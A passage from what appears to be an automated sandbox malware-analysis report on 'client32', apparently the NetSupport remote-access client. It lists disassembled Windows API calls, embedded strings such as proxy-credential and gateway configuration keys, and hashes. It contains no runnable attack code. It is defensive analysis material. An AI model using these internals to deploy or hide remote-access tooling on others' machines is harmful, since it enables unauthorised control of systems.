                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                  • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                  • API String ID: 1428277488-3745656997
                                                                                  • Opcode ID: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                  • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                  • Opcode Fuzzy Hash: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                  • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                  • InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  • _sprintf.LIBCMT ref: 11031401
                                                                                  • _setlocale.LIBCMT ref: 1103140B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                  • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                  • API String ID: 4242130455-3745656997
                                                                                  • Opcode ID: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                  • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                  • Opcode Fuzzy Hash: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                  • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • wsprintfA.USER32 ref: 11028814
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                  • wsprintfA.USER32 ref: 11028891
                                                                                  • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                  • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                  • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                  • API String ID: 512045693-419896573
                                                                                  • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                  • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                  • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                  • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                  • API String ID: 2111968516-2157635994
                                                                                  • Opcode ID: ef74d2877e5902aa82a13beae3e67c4a3f2c51c3e8246414091ce5192f680592
                                                                                  • Instruction ID: 0fc63aa45d6289b6a78bf38bef8a2fda7982e9afc231de32180b84e3236b59fa
                                                                                  • Opcode Fuzzy Hash: ef74d2877e5902aa82a13beae3e67c4a3f2c51c3e8246414091ce5192f680592
                                                                                  • Instruction Fuzzy Hash: 2F22A2B2E00368AFDB20DE64DC81EEAB7B9BB4A304F0485D9E549A7180D6356FC5CF51
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(PCIINV.DLL,50D94AA1,02D273B0,02D273A0,?,00000000,1118368C,000000FF,?,11032002,02D273B0,00000000,?,?,?), ref: 11086115
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                    • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                  • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                  • wsprintfA.USER32 ref: 110861EB
                                                                                  • wsprintfA.USER32 ref: 11086202
                                                                                  • wsprintfA.USER32 ref: 11086219
                                                                                  • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D68
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D7B
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D8E
                                                                                    • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085DA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                  • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                  • API String ID: 4263811268-2492245516
                                                                                  • Opcode ID: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                  • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                  • Opcode Fuzzy Hash: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                  • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                  APIs
                                                                                  • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                  • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                  • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                  • API String ID: 2061479752-1320826866
                                                                                  • Opcode ID: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                  • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                  • Opcode Fuzzy Hash: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                  • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                  APIs
                                                                                    • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                    • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                    • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                    • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                    • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                    • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                  • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                  • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                  • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                  • GetDC.USER32(00000000), ref: 11134E13
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                  • CreateWindowExA.USER32(00000001,NSMWClass,02D119D8,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                  • String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                  • API String ID: 1594747848-4184434473
                                                                                  • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                  • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                  • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                  • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,50D94AA1,?,00000000,00000000), ref: 1102D594
                                                                                  • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                  • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                  • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                  • API String ID: 83693535-1096744297
                                                                                  • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                  • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                  • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                  • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                  APIs
                                                                                    • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                  • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                    • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                  • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                    • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                  • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                  • API String ID: 596640303-1725438197
                                                                                  • Opcode ID: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                  • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                  • Opcode Fuzzy Hash: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                  • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                    • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                    • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Enum$Open$CloseValue
                                                                                  • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                  • API String ID: 2823542970-1528906934
                                                                                  • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                  • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                  • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                  • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetTickCount.KERNEL32 ref: 111385E2
                                                                                    • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                    • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                    • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                    • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                  • GetTickCount.KERNEL32 ref: 111385F1
                                                                                  • _memset.LIBCMT ref: 11138633
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                  • _strrchr.LIBCMT ref: 11138658
                                                                                  • _free.LIBCMT ref: 111386AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                  • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                  • API String ID: 711243594-1270230032
                                                                                  APIs
                                                                                  • ioctlsocket.WSOCK32 ref: 6F9F7642
                                                                                  • connect.WSOCK32(00000000,?,?), ref: 6F9F7659
                                                                                  • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6F9F7660
                                                                                  • _memmove.LIBCMT ref: 6F9F76D3
                                                                                  • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6F9F76F3
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F7717
                                                                                  • ioctlsocket.WSOCK32 ref: 6F9F775C
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9F7762
                                                                                  • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6F9F777A
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6F9F778B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                  • String ID: *BlockingIO$ConnectTimeout$General
                                                                                  • API String ID: 4218156244-2969206566
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11133B70
                                                                                  • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                  • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                  Strings
                                                                                  Memory Dump Source
